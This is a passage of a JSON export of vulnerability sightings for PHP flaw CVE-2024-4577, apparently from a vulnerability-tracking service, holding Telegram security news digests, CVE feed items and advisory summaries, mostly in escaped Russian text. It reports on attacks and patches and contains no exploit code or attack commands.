\u0434\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 8.1.\u0445-8.3.\u0445, \u0432 \u0430\u0434\u0432\u0430\u0439\u0437\u043e\u0440\u0438 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0435\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0432 mod_rewrite.\n\n\ud83d\udc6e\u200d\u2640 \u041d\u043e\u0432\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043e\u0442 \u0433\u0440\u0443\u043f\u043f\u044b ExCobalt, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u043f\u0435\u0440\u0435\u0441\u0435\u043a\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u0441 Shedding Zmiy \u0438 Sneaking leprechaun. \u0426\u0435\u043b\u044c\u044e \u0430\u0442\u0430\u043a \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u043f\u0438\u043e\u043d\u0430\u0436, \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438 \u2014 \u0433\u043e\u0441\u043e\u0440\u0433\u0430\u043d\u044b \u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u0435, \u0418\u0422.\n\n\ud83e\ude9f Microsoft \u043f\u0435\u0440\u0435\u0434\u0443\u043c\u0430\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c spyware \u0418\u0418-\u043f\u043e\u0438\u0441\u043a Recall \u0432 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435. \u042d\u0442\u0443 \u043d\u0435\u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e. \u0422\u0430\u043a\u0436\u0435 \u043e\u0431\u0435\u0449\u0430\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0431\u0430\u0437\u044b, \u043d\u043e \u043a\u0430\u043a \u044d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435, \u043f\u043e\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e. \n\n\ud83d\udc7b \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0443\u0441\u0442\u0440\u043e\u0435\u043d \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0439 \u0440\u044b\u043d\u043e\u043a \u043f\u043e\u0438\u0441\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u0431\u0430\u0433 \u0431\u0430\u0443\u043d\u0442\u0438 \u2014 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u043e 80 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430\u0445 \u0437\u0434\u0435\u0441\u044c, \u0430 \u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0430\u0442\u043a\u0430\u044f \u0432\u044b\u0436\u0438\u043c\u043a\u0430 \u043e\u0442 \u0441\u0430\u043c\u043e\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u0430 \u0437\u0434\u0435\u0441\u044c.\n\n\u041d\u043e\u0432\u0430\u044f \u043d\u0435\u0434\u0435\u043b\u044f \u2014 \u043d\u043e\u0432\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0432 npm \u0438 PyPi. \n\n\u0420\u0435\u0436\u0435 \u0434\u0432\u0443\u0445 \u0432\u044b\u0448\u0435\u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u0432 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 VSCode Marketplace, \u0430 \u043d\u0430 \u043d\u0451\u043c \u0442\u043e\u0436\u0435 \u043d\u0435\u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u2014 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043d\u0430\u0448\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 1000 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0441 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0438 \u0435\u0449\u0451 10 \u0442\u044b\u0441\u044f\u0447 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439. \n\n\ud83c\udf83 \u0421\u0432\u0435\u0436\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f ESXi-\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u0430 \u043e\u0442 Mallox/TargetCompany \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0432\u0435 \u043a\u043e\u043f\u0438\u0438 \u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u0414\u0430\u0436\u0435 \u0443 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0430\u0440\u0449\u0438\u043a\u043e\u0432 \u0435\u0441\u0442\u044c \u0431\u044d\u043a\u0430\u043f\u044b! \ud83e\udd2a\n\n\ud83d\udcbe \u0418\u043d\u043e\u0433\u0434\u0430 \u0430\u043b\u0431\u0430\u043d\u0441\u043a\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044e\u0442\u0441\u044f: \u043d\u043e\u0432\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u0440\u043e\u0441\u044f\u0442 \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438 \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u043e\u0434 \u0432 \u043e\u043a\u043d\u043e Powershell.\n\n\u0420\u0430\u0437\u0431\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0435\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 RansomHub, \u0440\u0430\u043d\u0435\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0432\u0448\u0435\u0439 \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c Knight.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 APT \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430 Crimson Palace. \u041f\u0440\u0430\u0432\u0434\u0430, \u0441 \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u043c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0430\u0437\u0438\u0430\u0442\u0441\u043a\u0438\u0445 APT, \u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u0435\u043d\u0430 \u2014 \u0440\u0430\u0437\u043b\u0438\u0447\u0430\u0442\u044c \u0432\u0441\u0435 \u044d\u0442\u0438 APT41/TA428/REF5961 \u0441\u0442\u0430\u043b\u043e \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0441\u043b\u043e\u0436\u043d\u0435\u0435.\n \n\ud83d\udd0b \u041a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0431\u043e\u0442\u043d\u0435\u0442 CommandoCat \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Docker.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT @\u041f2\u0422", "creation_timestamp": "2024-06-10T19:19:00.000000Z"}, {"uuid": "34e28ea6-b826-4dfe-81a4-19b58e0e038c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/kasperskyb2b/1340", "content": "\ud83d\udd0e \u0412\u0430\u0436\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83c\udd94 \u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 spearphishing \u0432 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430\u0445.  \u041d\u043e\u0432\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f LLM, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0438\u043c \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0440\u0430\u0441\u0441\u044b\u043b\u043e\u043a, \u0430 \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u0442\u0435\u0447\u043a\u0438 \u041f\u0414 \u0434\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0435 \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f.\n\n\ud83c\udf83 APT CloudSorcerer \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0433\u043e\u0441\u043e\u0440\u0433\u0430\u043d\u044b. C2 \u2014 \u043d\u0430 Github, \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u2014 \u0447\u0435\u0440\u0435\u0437 Dropbox \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\n\n\ud83d\udd34 \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 CRYSTALRAY, \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0447\u0435\u0440\u0435\u0437 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b n-day, \u0440\u0435\u0437\u043a\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u043c\u0430\u0441\u0448\u0442\u0430\u0431 \u0441\u0432\u043e\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438. \u041d\u0430 \u043f\u043e\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0412\u041f\u041e SSH-snake, \u044d\u0442\u043e\u0442 open source \u0447\u0435\u0440\u0432\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438. \u0426\u0435\u043b\u044c\u044e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0440\u043e\u0432\u0441\u0442\u0432\u043e \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\u270f\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0446\u0438\u0444\u0440\u044b \u0438\u0437 Cloudflare appsec report: \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u0443 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430 33% \u0431\u043e\u043b\u044c\u0448\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 API endpoints, \u0447\u0435\u043c \u043e\u043d\u0430 \u0437\u043d\u0430\u0435\u0442. \u0420\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u043e\u043d\u0438 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0435 \u0443\u0447\u0442\u0435\u043d\u044b, \u043d\u043e \u0438 \u043d\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 47 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432, \u043f\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u043c \u0430 \u043b\u044f \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0439 polyfill.\n\n\ud83d\udc40 \u041a\u0441\u0442\u0430\u0442\u0438, \u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0430\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u2014 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e npm \u0438 PyPi \u0441\u0442\u0440\u0430\u0434\u0430\u044e\u0442 \u043e\u0442 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u043d\u0430\u0431\u0435\u0433\u043e\u0432 \u2014 \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 .net \u0431\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 NuGet. \n\n\ud83d\udd13 \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 FIN7 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0437\u0430\u0442\u0438\u0448\u044c\u044f, \u0432\u0438\u0434\u0438\u043c\u043e, \u0441\u043c\u0435\u043d\u0438\u043b\u0430 \u0444\u043e\u043a\u0443\u0441 \u0441\u0432\u043e\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u2014 \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435, \u0435\u0439 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0443\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0412\u041f\u041e.\n\n\ud83d\udd0e \u0410\u043d\u0430\u043b\u0438\u0437 \u0412\u041f\u041e Dodgebox, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f APT41/Earth Baku/Winnti. Dodgebox \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 Stealthvector, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u0430\u043c \u0431\u044d\u043a\u0434\u043e\u0440 MoonWalk.  \u0411\u044d\u043a\u0434\u043e\u0440\u0443 \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\ud83e\udd21 \u041f\u043e\u0441\u043b\u0435 \u0432\u043e\u043b\u043d\u044b \u0432\u043e\u0437\u043c\u0443\u0442\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u0442\u0435\u0447\u0435\u043a Snowflake \u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u0440\u0438\u043d\u0443\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 MFA \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432. \n\n\ud83d\udc6e\u200d\u2640\ufe0f \u0420\u0430\u0437\u0431\u043e\u0440 \u0441\u0432\u0435\u0436\u0438\u0445 \u0442\u0430\u043a\u0442\u0438\u043a \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 ransomware-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a: Akira, Bianlian, Estate, Hardbit.\n\n\ud83d\udcac \u0421\u0435\u0440\u044c\u0451\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Exim \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043c\u0435\u0439\u043b\u044b \u043c\u043e\u0436\u043d\u043e \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432 \u043e\u0431\u0445\u043e\u0434 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u0444\u0438\u043b\u044c\u0442\u0440\u043e\u0432. \u0417\u0430\u043a\u0440\u044b\u0432\u0430\u0442\u044c CVE-2024-39929 \u043d\u0430\u0434\u043e \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e.\n\n\u0410 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430\u044f \u0434\u044b\u0440\u0430 \u0432 PHP (CVE-2024-4577, \u0432\u043b\u0438\u044f\u0435\u0442 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430 Windows-\u0441\u0435\u0440\u0432\u0435\u0440\u044b) \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\n\n\ud83d\udcf1 \u0428\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0439 Android-\u0437\u043b\u043e\u0432\u0440\u0435\u0434 Guardzoo \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u0432\u043e\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430 \u0411\u043b\u0438\u0436\u043d\u0435\u043c \u0412\u043e\u0441\u0442\u043e\u043a\u0435.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-07-15T10:31:36.000000Z"}, {"uuid": "0f60718b-8299-4a04-b3e0-8252f298462f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/33683", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-09-03T19:49:52.000000Z"}, {"uuid": "866a369b-45a1-4fbf-9b8d-f8815c954bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/FGv9QvBjHqqlPaJs4mkvqM7AFTx31TVwbebmJKV0PFIleA", "content": "", "creation_timestamp": "2024-06-09T05:32:25.000000Z"}, {"uuid": "4879a287-d86f-4cea-8ac9-3a67d5fb1c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/cibsecurity/77851", "content": "\ud83e\udd85 CVE-2024-4577: Ongoing Exploitation of a Critical PHP Vulnerability \ud83e\udd85\n\n    Overview\u00a0   On May 7, 2024, Devcore Principal Security Researcher Orange Tsai discovered and reported a critical Remote Code Execution RCE vulnerability, CVE20244577, to the PHP official team. This vulnerability stems from errors in character encoding conversions, particularly affecting the \"Best Fit\" feature on Windows operating systems.\u00a0\u00a0   Exploiting this flaw could potentially enable threat actors TAs to remotely execute arbitrary code, posing significant security risks to PHP installations across all versions running on Windows platforms. Recognizing the severity of the issue, the PHP development team promptly addressed CVE20244577 by releasing an official patch on June 6, 2024.\"\u00a0   On June 8th, cybersecurity researchers at Imperva reported the first instance of TAs exploiting ...\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"CYBLE\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2024-06-14T17:31:16.000000Z"}, {"uuid": "48e6a8e9-6937-41e1-8a21-f1a72e1c7a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/iWwhL3vVn5gkGYogD_VioyWkvL9g4FAnUfLQxP8LOgfIjQ", "content": "", "creation_timestamp": "2024-06-09T05:23:42.000000Z"}, {"uuid": "b99b4ae0-90d9-4c71-a629-132f8edeeaea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/cvedetector/7300", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-8926 - Microsoft PHP Codepage Command Injection Exploit\", \n  \"Content\": \"CVE ID : CVE-2024-8926 \nPublished : Oct. 8, 2024, 4:15 a.m. | 37\u00a0minutes ago \nDescription : In PHP versions 8.1.* before 8.1.30, 8.2.* before 8.2.24, 8.3.* before 8.3.12,\u00a0when using a certain non-standard configurations of Windows codepages, the fixes for\u00a0 CVE-2024-4577  \u00a0may still be bypassed and the same command injection related to Windows \"Best Fit\" codepage behavior can be achieved. This\u00a0may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. \nSeverity: 8.1 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:00:57.000000Z"}, {"uuid": "1954953f-3fad-4491-8aa0-94aa26380a5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/bizone_channel/1259", "content": "\ud83e\udd65 \u0418 \u0441\u043d\u043e\u0432\u0430 PHP: BI.ZONE WAF \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-4577\n\n\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e \u043d\u043e\u0432\u043e\u0439 